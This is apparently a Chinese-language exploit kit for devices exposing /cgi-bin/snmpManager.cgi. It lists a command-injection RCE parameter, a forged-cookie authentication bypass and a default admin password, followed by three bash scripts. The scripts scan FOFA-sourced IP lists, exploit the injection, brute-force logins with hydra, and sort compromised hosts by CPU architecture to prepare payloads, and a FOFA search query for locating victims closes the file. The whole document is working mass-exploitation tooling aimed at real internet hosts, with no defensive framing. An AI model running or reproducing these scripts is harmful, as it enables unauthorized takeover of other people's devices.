1、命令注入RCE
漏洞地址 cgimodule=net_diagnose&diagnose_type=0&domain=%7C+COMMAND"
2、认证绕过 cookie伪造
name=admin domain=$random language=0 sessionid=0 path=
3、默认密码
ieee802.11 admin 123456
check.sh
对fofa获取的ip进行针对性成活检测
用法 ./check.sh checkfile 文件中每行一个ip,格式为http://ip
v1.sh
对文本中的目标进行rce检测,并生成rce-ok rce-no 和notfound三个文件
用法 ./v1.sh 状态200文件,文件中每行一个ip,格式为http://ip
对v1.sh处理后,从rce-ok提取的ip进行分类,分为mips,i686,x86_64 ,并为执行特定payload做准备
用法 ./exp.sh filename-rce-ok 每行一个ip,格式为http://ip{,username,password},需要密码获取cookies的则需要密码,否则不需要
check.sh
#!/bin/bash
mkdir tmp
echo "e.g: ./check.sh checkfile "
FileName="$1"
for i in `cat $filename`
do
url=$i/cgi-bin/snmpManager.cgi?cgimodule=login
code=$(curl -s -o tmp/checkkk.txt -w %{http_code} --connect-timeout 1 -m 1 $url)
# code=$(curl -s -o tmp/checkkk.txt -w %{http_code} --connect-timeout 0.4 -m 0.5 $url)
if ((code == 200)) || ((cat tmp/checkkk.txt | grep /black.jpg)) >/dev/null 2>&1 ; then
echo $i >> $filename-200
echo -e "\033[31m $i Success! \033[0m"
else
echo $i "Failed!"
fi
done
v1.sh
#!/bin/bash
#这个版本为可破解web认证版本
rm tmp/*
rm -f hydra.restore
echo "e.g: ./v1.sh filename "
FileName="$1"
PassFile="v1pass.txt"
COMMAND=" uname -a"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
echo $random
for i in `cat $FileName`
do
echo -------------------
whatweb $i
url=$i/cgi-bin/snmpManager.cgi
url_login=${url}?cgimodule=login
url_rce=${url}?cgimodule=net_diagnose
cookies_bypass="name=admin domain=$random language=0 sessionid=0 path="
post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
post_getdata="cgimodule=ajax_diagnose"
code_200=`curl -s -o tmp/check.txt -w %{http_code} --connect-timeout 2 -m 5 $url_login`
if ((code_200 == 200)); then
if grep /black.jpg tmp/check.txt >/dev/null 2>&1 ; then
echo 指纹匹配 ok
curl -s -o /dev/null --cookie "$cookies_bypass" -d $post_cmd+id $url_rce
curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
echo 执行命令 $COMMAND
curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
curl -s --cookie "$cookies_bypass" -d $post_getdata $url
echo $i >> $FileName-Rce-OK
echo " \n "
else
echo crack 密码
echo > tmp/secces.txt
Username=admin
rhost=`echo $i | sed 's/http\:\/\///g' | cut -d ":" -f1`
rport=`echo $i | awk -F ':' '{print $3}'`
hydra -l $Username -P $PassFile $rhost -s $rport http-post-form "/cgi-bin/snmpManager.cgi:cgimodule=login&username=^USER^&passwd=^PASS^&language=2:black.jpg" -t 1 -f | grep http-post-form | grep password > tmp/secces.txt
Password=`cut -d " " -f 11 tmp/secces.txt | sed 's/^[ ]*//'| sed '/^$/d'`
post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
if [[ -n $Password ]];then
echo 密码破解成功
echo "password:" $Password
curl -s -o /dev/null -m 5 -c tmp/gbcookies.txt -d $post_auth $url_login
curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d $post_cmd+id $url_rce
curl -s -o tmp/exp_log2.txt -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
if grep uid tmp/exp_log2.txt >/dev/null 2>&1 ; then
echo 执行命令 $COMMAND
curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
curl -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
echo -e "\033[33m User:$Username Pass:$Password \033[0m"
echo $i $Username $Password >> $FileName-Rce-OK
else
echo -e "\033[33m User:$Username Pass:$Password But Can't RCE !!\033[0m "
echo $i $Username $Password >> $FileName-Rce-NO
fi
else
echo -e "\033[33m Password Not Found !!\033[0m "
echo $i >> $FileName-Password-NotFound
fi
fi
else
echo "$i failed"
fi
fi
done
exp.sh
#!/bin/bash
#这个版本利用rce-ok文件中ip直接执行命令
echo "e.g: ./exp.sh filename-rce-ok "
FileName="$1"
rm -f hydra.restore
PassFile="v1pass.txt"
random=$(cat /dev/urandom | sed "s/[^a-zA-Z0-9]//g" | strings -n 5 | head -n 1)
COMMAND=" uname -a"
post_cmd="cgimodule=net_diagnose&diagnose_type=0&domain=%7C"
post_getdata="cgimodule=ajax_diagnose"
for i in `cat $FileName`
do
rhost=`echo $i | awk '{print $1}'`
Username=`echo $i | awk '{print $2}'`
Password=`echo $i | awk '{print $3}'`
echo -------------------
whatweb $rhost
url=$rhost/cgi-bin/snmpManager.cgi
url_login=${url}?cgimodule=login
url_rce=${url}?cgimodule=net_diagnose
cookies_bypass="name=admin domain=$random language=0 sessionid=0 path="
curl -s -o /dev/null --cookie "$cookies_bypass" -d $post_cmd+id $url_rce
curl -s -o tmp/exp_log.txt --cookie "$cookies_bypass" -d $post_getdata $url
if grep uid tmp/exp_log.txt >/dev/null 2>&1 ; then
echo 执行命令 $COMMAND
curl -s -o /dev/null --cookie "$cookies_bypass" -d "$post_cmd+$COMMAND" $url_rce
curl -s -o tmp/rce-data --cookie "$cookies_bypass" -d $post_getdata $url
if grep mips tmp/rce-data >/dev/null 2>&1; then
echo $rhost >> $FileName-rce-mips
cat tmp/rce-data
echo "\n"
elif grep i686 tmp/rce-data >/dev/null 2>&1; then
echo $rhost >> $FileName-rce-i686
cat tmp/rce-data
echo "\n"
else
cat tmp/rce-data
echo "\n"
echo $rhost >> $FileName-rce-x86_64
fi
else
post_auth="cgimodule=login&username=$Username&passwd=$Password&language=2"
echo 执行命令 $COMMAND
curl -s -o /dev/null -m 5 -c tmp/gbcookies.txt -d $post_auth $url_login
curl -s -o /dev/null -m 5 -b tmp/gbcookies.txt -d "$post_cmd+$COMMAND" $url_rce
curl -s -o tmp/rce-data -m 5 -b tmp/gbcookies.txt -d $post_getdata $url
echo -e "\033[33m User:$Username Pass:$Password \033[0m"
if grep mips tmp/rce-data >/dev/null 2>&1; then
echo $rhost >> $FileName-rce-mips
cat tmp/rce-data
echo "\n"
elif grep i686 tmp/rce-data >/dev/null 2>&1; then
echo $rhost >> $FileName-rce-i686
cat tmp/rce-data
echo "\n"
else
cat tmp/rce-data
echo "\n"
echo $rhost >> $FileName-rce-x86_64
fi
fi
done
FoFa 搜索语句
"/cgi-bin/snmpManager.cgi"